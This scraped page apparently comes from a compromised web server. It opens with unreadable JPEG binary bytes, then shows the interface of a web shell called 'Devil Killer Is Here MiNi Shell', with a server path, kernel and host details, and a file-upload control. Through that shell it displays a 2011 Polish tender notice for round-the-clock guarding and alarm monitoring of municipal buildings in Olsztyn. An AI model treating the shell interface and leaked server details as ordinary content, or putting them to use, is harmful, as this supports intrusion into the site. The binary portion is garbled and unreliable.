JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111216/334823-N-2011.html

<p class="kh_header"><b>Olsztyn: Całodobowy dozór i ochrona fizyczna oraz stały nadzór systemu alarmowego zainstalowanego w pomieszczeniach w budynkach administrowanych przez Zakład Lokali i Budynków Komunalnych w Olsztynie</b><br>
<b>Numer ogłoszenia: 334823 - 2011; data zamieszczenia: 16.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Lokali i Budynków Komunalnych , ul. Cicha 5, 10-313 Olsztyn, woj. warmińsko-mazurskie, tel. 089-533-36-26, faks 089-533-39-37.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlibk.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całodobowy dozór i ochrona fizyczna oraz stały nadzór systemu alarmowego zainstalowanego w pomieszczeniach w budynkach administrowanych przez Zakład Lokali i Budynków Komunalnych w Olsztynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie całodobowego dozoru i ochrony fizycznej oraz nadzoru systemu alarmowego zainstalowanego w pomieszczeniach w budynkach administrowanych przez Zakład Lokali i Budynków Komunalnych w Olsztynie, polegających na: 
ZADANIE I
- całodobowym dozorze i ochronie fizycznej nieruchomości gruntowej, zabudowanej 1 budynkiem opróżnionym i wykwaterowanym, położonej w Olsztynie przy ul. Knosały 7c oznaczonej w ewidencji gruntów i budynków obrębu nr 65 m. Olsztyn, działka nr 49;
ZADANIE II
- całodobowym dozorze i ochronie fizycznej budynku przy ul. Kołobrzeskiej 32B   w Olsztynie obejmującej lokale wykwaterowane oraz części wspólne.
ZADANIE III
- całodobowym dozorze i ochronie fizycznej 3 pawilonów kontenerowych       ( działka Nr 27/1 obręb 84 ) przy ul. Towarowej 18 M, N, L w Olsztynie
ZADANIE IV
- całodobowym dozorze i ochronie fizycznej lokalu nr 6 w budynku przy ul. Nowowiejskiego 7 w Olsztynie.

ZADANIE V
1) stałym nadzorze systemu alarmowego zainstalowanego w pomieszczeniach w budynku przy ul. Cichej 5 w Olsztynie.
2) stałym nadzorze systemu alarmowego zainstalowanego w pomieszczeniach w budynku przy ul. Kopernika 45 w Olsztynie.

CPV  - 79710000- 4    usugi ochroniarskie
CPV  - 79711000-1     usługi nadzoru przy użyciu alarmu
 CPV - 98341140 8     usługi dozorowania

2. Dopuszczalność składania ofert częściowych.
1) Zamawiający dopuszcza składanie ofert częściowych na świadczenie usług:                
a) Zadanie I - Całodobowy dozór i ochrona fizyczna na terenie nieruchomości gruntowej, zabudowanej 1 budynkiem opróżnionym i wykwaterowanym, położonej w Olsztynie przy ul. Knosały 7c oznaczonej w ewidencji gruntów i budynków obrębu nr 65 m. Olsztyn, działka nr 49
b) Zadanie II - Całodobowy dozór i ochrona fizyczna budynku przy ul. Kołobrzeskiej 32B  w Olsztynie obejmującej lokale wykwaterowane oraz części wspólne 
c) Zadanie III - Całodobowy dozór i ochrona fizyczna 3 pawilonów kontenerowych   ( działka Nr 27/1 obręb 84 ) przy ul. Towarowej 18 M, N, L w Olsztynie
d) Zadanie IV -  Całodobowy dozór i ochrona fizyczna lokalu nr 6 w budynku    przy ul. Nowowiejskiego 7 w Olsztynie 
e) Zadanie V - Stały nadzór systemu alarmowego zainstalowanego w pomieszczeniach w budynkach administrowanych przez Zakład Lokali i Budynków Komunalnych w Olsztynie

3. ZADANIE I - Całodobowy dozór i ochrona fizyczna:
     - na terenie nieruchomości gruntowej, zabudowanej 1 budynkiem opróżnionym  i wykwaterowanym, położonej w Olsztynie przy ul. Knosały 7c oznaczonej w ewidencji gruntów i budynków obrębu nr 65 m. Olsztyn, działka nr 49;
     WARUNKI REALIZACJI:
1) Ochrona mienia realizowana będzie na terenie nieruchomości gruntowej zabudowanej, 1 budynkiem opróżnionym i wykwaterowanym, położonej w Olsztynie przy ul. Knosały 7c oznaczonej w ewidencji gruntów i budynków obrębu nr 65 m. Olsztyn, działka nr 49 
2) Zakres ochrony obejmuje zabezpieczenie chronionego terenu i opróżnionego budynku w celu zapobieżenia kradzieżom, dewastacji mienia, wtargnięcia osób niepowołanych, pożarom i awariom instalacji wywołanych przez osoby trzecie, niedopuszczeniem do wstępu osób nieupoważnionych na teren chroniony.
3) Ochrona fizyczna wykonywana będzie poprzez stały dozór fizyczny całodobowo przez 7 dni w tygodniu w dni robocze (w tym soboty) oraz w dni wolne od pracy (niedziele, święta).
4) Ochrona fizyczna realizowana będzie przez co najmniej jednego pracownika posiadającego odpowiednie kwalifikacje.
5) W razie zagrożenia chronionego mienia Wykonawca zobowiązany jest podjąć czynności zmierzające do zapobieżenia wystąpieniu szkody, a  w razie jej zaistnienia do ograniczenia jej rozmiarów i natychmiastowego powiadomienia Zamawiającego, Policji, Straży Pożarnej i innych właściwych służb.
6) Wykonawca dołoży wszelkich starań, aby realizować usługę ochrony mienia 
z należytą starannością wymaganą dla usług tego rodzaju, czyli w sposób profesjonalny  i  kompetentny.
ZAKRES ZADAŃ I OBOWIĄZKÓW PRACOWNIKÓW WYKONAWCY
1) osoby wykonujące usługę ochrony mienia muszą posiadać odpowiednie kwalifikacje i uprawnienia oraz muszą być sprawdzone pod względem niekaralności i odpowiednio przeszkolone. 
2) Pracownicy ochrony fizycznej muszą nosić ubiór umożliwiający ich identyfikację oraz identyfikację podmiotu zatrudniającego.
3) Identyfikatory i odznaki pracowników ochrony fizycznej zatrudnionych przez Wykonawcę muszą w sposób widoczny różnić się od identyfikatorów i odznak funkcjonariuszy  i pracowników służb publicznych.
4) Pracownicy ochrony fizycznej muszą być wyposażeni przez Wykonawcę w odpowiednie środki łączności i komunikacji.
5) Zamawiający ma prawo domagać się zmiany pracowników ochrony fizycznej,  a Wykonawca jest zobowiązany do dokonania takiej zmiany w ciągu 3 dni od pisemnego powiadomienia przez Zamawiającego.
6) O każdej zmianie w składzie pracowników ochrony Wykonawca będzie zawiadamiać Zamawiającego niezwłocznie na piśmie. Wykonawca ma prawo do zmiany pracowników ochrony prowadzących działania prewencyjne mając na uwadze podniesienie bezpieczeństwa chronionego obiektu Zamawiającego. W razie zmiany składu personalnego pracowników ochrony, nowo wprowadzone osoby będą spełniały wymogi określone w pkt 1, 2, 3 i 4 niniejszego punktu. 
4. ZADANIE II - Całodobowy dozór i ochrona fizyczna:
- budynku przy ul. Kołobrzeskiej 32B w Olsztynie obejmującej lokale wykwaterowane oraz części wspólne.
WARUNKI REALIZACJI: 
1) Ochrona mienia realizowana będzie w budynku przy ul. Kołobrzeskiej 32B w Olsztynie w zakresie obejmującym części wspólne i lokale wykwaterowane, zgodnie z załącznikiem nr 1 do niniejszej umowy.
2) Aktualizacja danych uwzględnionych w załączniku nr 7 do SIWZ, będącym jednocześnie załącznikiem nr 1 do umowy odbywać się będzie w dniu dokonania zmiany, w formie pisemnej. Zmiany w/w obowiązują od dnia ich wprowadzenia bez konieczności wypowiadania i zmiany umowy. Obowiązującym jest pisemne zawiadomienie Wykonawcy.
3) Zakres ochrony obejmuje zabezpieczenie opróżnionych i wykwaterowanych lokali i części wspólnych w celu zapobieżenia kradzieżom, dewastacji mienia, wtargnięcia osób niepowołanych, pożarom i awariom instalacji wywołanych przez osoby trzecie, niedopuszczeniem do wstępu osób nieupoważnionych na teren chroniony.
4) Ochrona fizyczna wykonywana będzie poprzez stały dozór fizyczny całodobowo przez 7 dni w tygodniu w dni robocze (w tym soboty) oraz w dni wolne od pracy (niedziele, święta)
5) Ochrona fizyczna realizowana będzie przez co najmniej jednego pracownika posiadającego odpowiednie kwalifikacje.
6) W razie zagrożenia chronionego mienia Wykonawca zobowiązany jest podjąć czynności zmierzające do zapobieżenia wystąpieniu szkody, a  w razie jej zaistnienia do ograniczenia jej rozmiarów i natychmiastowego powiadomienia Zamawiającego, Policji, Straży Pożarnej i innych właściwych służb.
7) Wykonawca dołoży wszelkich starań, aby realizować usługę ochrony mienia 
z należytą starannością wymaganą dla usług tego rodzaju, czyli w sposób profesjonalny  i  kompetentny. 
ZAKRES ZADAŃ I OBOWIĄZKÓW PRACOWNIKÓW WYKONAWCY
1) Pracownik ochrony fizycznej jest zobowiązany do zamykania w godzinach 22:00 - 06:00 wyjścia awaryjnego znajdującego się w ścianie szczytowej przedmiotowego budynku  od  strony ul. Kołobrzeskiej oraz zobowiązany jest do zamieszczenia w przedmiotowym budynku informacji o umiejscowieniu klucza do w/w wyjścia awaryjnego.
2) osoby wykonujące usługę ochrony mienia muszą posiadać odpowiednie kwalifikacje i uprawnienia oraz muszą być sprawdzone pod względem niekaralności i odpowiednio przeszkolone. 
3) Pracownicy ochrony fizycznej muszą nosić ubiór umożliwiający ich identyfikację oraz identyfikację podmiotu zatrudniającego.
4) Identyfikatory i odznaki pracowników ochrony fizycznej zatrudnionych przez Wykonawcę muszą w sposób widoczny różnić się od identyfikatorów i odznak funkcjonariuszy  i pracowników służb publicznych.
5) Pracownicy ochrony fizycznej muszą być wyposażeni przez Wykonawcę w odpowiednie środki łączności i komunikacji.
6) Zamawiający ma prawo domagać się zmiany pracowników ochrony fizycznej,  a Wykonawca jest zobowiązany do dokonania takiej zmiany w ciągu 3 dni od pisemnego powiadomienia przez Zamawiającego.
7) O każdej zmianie w składzie pracowników ochrony Wykonawca będzie zawiadamiać Zamawiającego niezwłocznie na piśmie. Wykonawca ma prawo do zmiany pracowników ochrony prowadzących działania prewencyjne mając na uwadze podniesienie bezpieczeństwa chronionego obiektu Zamawiającego. W razie zmiany składu personalnego pracowników ochrony, nowo wprowadzone osoby będą spełniały wymogi określone w pkt 2, 3, 4 5 niniejszego punktu.  
5. ZADANIE III - Całodobowy dozór i ochrona fizyczna:
- 3 pawilonów kontenerowych ( działka Nr 27/1 obręb 84 ) przy ul. Towarowej 18 M, N, L w Olsztynie  
WARUNKI REALIZACJI: 
1) Ochrona mienia realizowana będzie na terenie nieruchomości położonej w Olsztynie przy ul. Towarowej 18 M, N, L oznaczonej w ewidencji gruntów i budynków obrębu 84 m. Olsztyna, działka nr 27/1.
2) Zakres ochrony obejmuje zabezpieczenie nowowybudowanych, częściowo zasiedlonych 3 pawilonów kontenerowych w celu zapobieżenia dewastacji mienia, wtargnięcia osób niepowołanych, zapobieżenia pożarom i awariom instalacji, a także niedopuszczenia do wstępu osób nieupoważnionych na teren chroniony.
3) Ochrona fizyczna wykonywana będzie poprzez stały dozór fizyczny całodobowo przez 7 dni w tygodniu w dni robocze (w tym soboty) oraz w dni wolne od pracy (niedziele, święta)
4) Ochrona fizyczna realizowana będzie przez co najmniej jednego pracownika posiadającego odpowiednie kwalifikacje
5) W razie zagrożenia chronionego mienia Wykonawca zobowiązany jest podjąć czynności zmierzające do zapobieżenia wystąpieniu szkody, a  w razie jej zaistnienia do ograniczenia jej rozmiarów i natychmiastowego powiadomienia Zamawiającego, Policji, Straży Pożarnej i innych właściwych służb
6) Wykonawca dołoży wszelkich starań, aby realizować usługę ochrony mienia 
z należytą starannością wymaganą dla usług tego rodzaju, czyli w sposób profesjonalny  i  kompetentny.
ZAKRES ZADAŃ I OBOWIĄZKÓW PRACOWNIKÓW WYKONAWCY
1) osoby wykonujące usługę ochrony mienia muszą posiadać odpowiednie kwalifikacje i uprawnienia oraz muszą być sprawdzone pod względem niekaralności i odpowiednio przeszkolone. 
2) Pracownicy ochrony fizycznej muszą nosić ubiór umożliwiający ich identyfikację oraz identyfikację podmiotu zatrudniającego.
3) Identyfikatory i odznaki pracowników ochrony fizycznej zatrudnionych przez Wykonawcę muszą w sposób widoczny różnić się od identyfikatorów i odznak funkcjonariuszy  i pracowników służb publicznych.
4) Pracownicy ochrony fizycznej muszą być wyposażeni przez Wykonawcę w odpowiednie środki łączności i komunikacji.
5) Zamawiający ma prawo domagać się zmiany pracowników ochrony fizycznej,    a Wykonawca jest zobowiązany do dokonania takiej zmiany w ciągu 3 dni od pisemnego powiadomienia przez Zamawiającego.
6) O każdej zmianie w składzie pracowników ochrony Wykonawca będzie zawiadamiać Zamawiającego niezwłocznie na piśmie. Wykonawca ma prawo do zmiany pracowników ochrony prowadzących działania prewencyjne mając na uwadze podniesienie bezpieczeństwa chronionego obiektu Zamawiającego. W razie zmiany składu personalnego pracowników ochrony, nowo wprowadzone osoby będą spełniały wymogi określone w pkt 1, 2, 3 i 4 niniejszego punktu. 
6. ZADANIE IV - Całodobowy dozór i ochrona fizyczna:
- lokalu nr 6 w budynku przy ul. Nowowiejskiego 7 w Olsztynie  
WARUNKI REALIZACJI: 
1) Ochrona mienia realizowana będzie w lokalu nr 6 w budynku przy ul. Nowowiejskiego 7   w Olsztynie
2) Zakres ochrony obejmuje zabezpieczenie przedmiotowego lokalu w celu zapobieżenia dewastacji mienia, wtargnięcia osób niepowołanych, zapobieżenia pożarom i awariom instalacji, a także niedopuszczenia do wstępu osób nieupoważnionych na teren chroniony.
3) Ochrona fizyczna wykonywana będzie poprzez stały dozór fizyczny całodobowo przez 7 dni w tygodniu w dni robocze (w tym soboty) oraz w dni wolne od pracy (niedziele, święta)
4) Ochrona fizyczna realizowana będzie przez co najmniej jednego pracownika posiadającego odpowiednie kwalifikacje
5) W razie zagrożenia chronionego mienia Wykonawca zobowiązany jest podjąć czynności zmierzające do zapobieżenia wystąpieniu szkody, a  w razie jej zaistnienia do ograniczenia jej rozmiarów i natychmiastowego powiadomienia Zamawiającego, Policji, Straży Pożarnej i innych właściwych służb
6) Wykonawca dołoży wszelkich starań, aby realizować usługę ochrony mienia 
z należytą starannością wymaganą dla usług tego rodzaju, czyli w sposób profesjonalny  i  kompetentny.
ZAKRES ZADAŃ I OBOWIĄZKÓW PRACOWNIKÓW WYKONAWCY
1) osoby wykonujące usługę ochrony mienia muszą posiadać odpowiednie kwalifikacje i uprawnienia oraz muszą być sprawdzone pod względem niekaralności i odpowiednio przeszkolone. 
2) Pracownicy ochrony fizycznej muszą nosić ubiór umożliwiający ich identyfikację oraz identyfikację podmiotu zatrudniającego.
3) Identyfikatory i odznaki pracowników ochrony fizycznej zatrudnionych przez Wykonawcę muszą w sposób widoczny różnić się od identyfikatorów i odznak funkcjonariuszy  i pracowników służb publicznych.
4) Pracownicy ochrony fizycznej muszą być wyposażeni przez Wykonawcę w odpowiednie środki łączności i komunikacji.
5) Zamawiający ma prawo domagać się zmiany pracowników ochrony fizycznej,    a Wykonawca jest zobowiązany do dokonania takiej zmiany w ciągu 3 dni od pisemnego powiadomienia przez Zamawiającego.
6) O każdej zmianie w składzie pracowników ochrony Wykonawca będzie zawiadamiać Zamawiającego niezwłocznie na piśmie. Wykonawca ma prawo do zmiany pracowników ochrony prowadzących działania prewencyjne mając na uwadze podniesienie bezpieczeństwa chronionego obiektu Zamawiającego. W razie zmiany składu personalnego pracowników ochrony, nowo wprowadzone osoby będą spełniały wymogi określone w pkt 1, 2, 3 i 4 niniejszego punktu. 
7. ZADANIE V - Stały nadzór systemu alarmowego zainstalowanego w pomieszczeniach: 
       - w budynku przy ul. Cichej 5 w Olsztynie
       - w budynku przy ul. Kopernika 45 w Olsztynie.
WARUNKI REALIZACJI: 
1) Usługa wykonywana będzie poprzez stały monitoring i w systemie ostrzegania całodobowo przez 7 dni w tygodniu.
2) Prowadzenie stałego nadzoru systemu alarmowego Wykonawcy będzie polegało na: 
a) całodobowym monitorowaniu sygnałów z systemu alarmowego Zamawiającego.
b) kontroli załączeń alarmowych w czasie, gdy:
- w budynku przy ul. Cichej nie przebywają pracownicy ZLiBK lub pracownicy firmy sprzątającej oraz w trakcie otwierania lub zamykania w/w budynku. 
- w budynku przy ul. Kopernika 45 w Olsztynie nie przebywają najemcy lokali użytkowych oraz w trakcie otwierania lub zamykania w/w budynku. 
c) całodobowej gotowości załóg interwencyjnych do podjęcia interwencji w ciągu 5 minut na sygnały wskazujące na dokonanie włamania lub napadu,
d) stałej kontroli poprawności łączy monitoringowych,
e) interwencjach na wezwanie w sytuacjach konfliktowych zaistniałych w obiekcie Zamawiającego,
f) Wykonawca zobowiązuje się do  4-krotnej nieodpłatnej zmiany kodu dostępu do budynku przy ul. Cichej 5 w Olsztynie wraz z przeszkoleniem nowego użytkownika. 
3) W przypadku odebrania sygnału o naruszeniu obszaru chronionego, operator zobowiązany jest do:
a) skierowania do chronionego obiektu zmotoryzowanego patrolu agentów ochrony w czasie najkrótszym od otrzymania sygnału alarmowego,
b) w przypadkach koniecznych powiadomienia Policji oraz Zamawiającego,
c) odnotowania otrzymania informacji i podjętych decyzji w książce dyżurów,
d) powiadomienia osoby upoważnionej przez Zamawiającego,
e) zabezpieczenia miejsca do czasu przybycia Policji i przedstawiciela Zamawiającego, za pierwszą godzinę w ramach umowy, a za każdą następną rozpoczętą  godzinę Zamawiający zapłaci Wykonawcy dodatkowo 15,00 zł plus podatek VAT.
f) w przypadku stwierdzenia wadliwości działania urządzeń alarmowych lub uszkodzeń systemu powstałych w wyniku działania osób trzecich albo w wyniku działania zdarzeń losowych niezwłocznie powiadomić Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art.67 ust.1 pkt 6 Ustawy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 98.34.11.40-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu uznania, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, Wykonawca przedstawia aktualną koncesję na działalność gospodarczą w zakresie usług ochrony osób i mienia wydaną przez Ministra Spraw Wewnętrznych i Administracji na podstawie ustawy z 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2005 r. nr 145, poz. 1221 z pózn. zm.), w zakresie usług ochrony osób i mienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, Zamawiający wymaga by Wykonawca wykazał, iż wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie: 
          1) wykaz realizacji usługi:
          - całodobowego dozoru i ochrony fizycznej minimum 3 budynków o kubaturze co najmniej 100m2 przez okres co najmniej 1 roku - dotyczy ZADANIA I, II i III.
          - stałego nadzoru systemu alarmowego zainstalowanego w minimum 2 budynkach  przez okres co najmniej 1 roku - dotyczy ZADANIA V,
 z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie (jak na załączonym druku lub w oparciu o załączony druk zał. nr 4 do SIWZ).
            2) Do ZADANIA IV Zamawiający nie wymaga szczegółowego warunku w zakresie wykazu realizacji usługi.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz co najmniej 4 osób, które będą uczestniczyć w wykonywaniu zamówienia, posiadających odpowiednie kwalifikacje i uprawnienia, które są sprawdzone pod względem niekaralności i odpowiednio przeszkolone wraz z  informacją o podstawie do dysponowania tymi osobami- załącznik Nr 5 do SIWZ - dotyczy  ZADANIA I, II, III, IV.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie aktualnej, opłaconej polisy ubezpieczeniowej lub innego aktualnego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100 000,00 zł w okresie związania ofertą. Ponadto Wykonawca złoży oświadczenie, że po upływie wartości odnowi ubezpieczenie na czas obejmujący wykonanie przedmiotu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

